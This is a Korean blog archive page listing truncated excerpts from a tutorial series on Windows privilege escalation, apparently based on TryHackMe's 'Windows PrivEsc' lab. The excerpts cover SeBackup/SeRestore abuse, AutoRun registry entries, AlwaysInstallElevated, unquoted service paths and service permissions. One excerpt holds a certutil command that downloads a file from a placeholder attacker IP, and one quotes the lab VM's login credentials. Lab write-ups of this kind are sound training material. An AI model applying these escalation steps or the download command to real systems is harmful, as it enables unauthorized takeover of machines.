0xMH

윈도우 환경 모든 유저에게 여러 개의 권한들이 있습니다. 어떤 유저인지에 따라 권한도 다르겠죠. 모든 유저에게 admin 권한을 주는 것이 너무 위험하기 때문에 유저가 하는 역할에 따라 그 유저에게 필요한 권한만 주는 것이 더 안전합니다. 하지만 해커가 발견했을 때 권한 상승이 가능한 권한들이 있는데 그중에 오늘은 SeBackup이라는 권한에 대해 알아보겠습니다. 먼저 유저에게 무슨 권한이 있는지를 확인하기 위해 "whoami /priv"를 입력합니다. SeBackup하고 SeRestore가 있는데 위험한 권한입니다. 이름 그대로 Admin 권한을 주는 것보다 시스템을 backup을 할 수 있는 권한을 주는 것이죠. SeBackup하고 SeRestore 권한들로 해커는 다양한 파일들을 read, writ..

Windows 해킹/권한상승 2022. 6. 19. 13:04

AutoRun도 Startup 권한 상승하고 비슷합니다. AutoRun 서비스들은 유저가 로그인할 때마다 부팅되는 프로그램들입니다. (카톡, 디스코드 등) winPEAS에 따르면 program.exe라는 프로그램인 AutoRun 기능이 있습니다. winPEAS 말고도 reg query로 AutoRun 프로그램들이 존재하는지 확인할 수 있습니다. AutoRun 프로그램들은 주로 "Run"하고 "RunOnce"이라는 registry path에 저장되어 있으므로... reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 위에 사진에 따르면 우리에게 AllAccess가 있기 때문에 역시 reverse.exe를 활용해 권한상승이 가능할 것입니다. AutoRu..

Windows 해킹/권한상승 2022. 6. 15. 14:08

윈도우 환경은 일반 유저가 시스템 권한으로 Microsoft Windows Installer 패키지(MSI)를 설치할 수 있는 그룹 정책 설정을 제공합니다. 이 문제는 일반 유저가 시스템 권한이 필요한 응용 프로그램을 설치하려고 하고 관리자가 사용자에게 임시 로컬 관리자 액세스 권한을 부여하지 않으려는 환경에서 발견될 수 있습니다. 해커가 AlwaysInstallElevated 그룹 정책을 발견했을 때 그것을 권한을 상승시키기 위해 악용할 수 있습니다. AlwaysInsatllElevated가 매우 위험하기 때문에 윈도우도 그 사용을 권장하지 않으며 일반 유저에게 admin 권한을 주는 것과 다를 것이 없다고 합니다. 재밌는 파트로 넘어가자면요... :) winpeas.exe를 돌려보면 다음과 같은 ou..

Windows 해킹/권한상승 2022. 6. 7. 12:24

실행 파일 경로에 공백이 포함되어 있고 따옴표로 묶이지 않는 서비스가 생성되면 사용자가 시스템 권한을 얻을 수 있는 Unquoted Service Path라는 취약성이 발생합니다. (당연히 우리가 hijack 하고자 하는 서비스는 system 권한이 있어야 권한 상승이 가능하죠) #1번 블로그에서는 winpeas를 사용했지만, 이번에는 PowerUp이라는 powershell 스크립트를 사용해 보겠습니다.똑같이 certutil.exe로 공격자의 서버에 있는 파일을 다운로드하고 실행시키면 됩니다.스크린 캡처 맨 밑에 "unquotedsvc" 서비스가 보입니다. 1) 다운로드 certutil.exe -urlcache -f -split http://공격자아이피/파일이름 2) powershell 실행 # ep는 ..

Windows 해킹/권한상승 2022. 6. 4. 12:53

새로운 "윈도우 환경 권한상승" 과목의 첫 글입니다. 윈도우 권한상승 과목의 블로그들은 tryhackme의 "Windows PrivEsc"이라는 강의를 바탕으로 쓰는 것입니다. https://tryhackme.com/room/windows10privesc TryHackMe | Windows PrivEsc Practice your Windows Privilege Escalation skills on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM! RDP is available. Credentials: user:password321 tryhackme.com Insecure Service Permissions란 ..

Windows 해킹/권한상승 2022. 6. 3. 15:17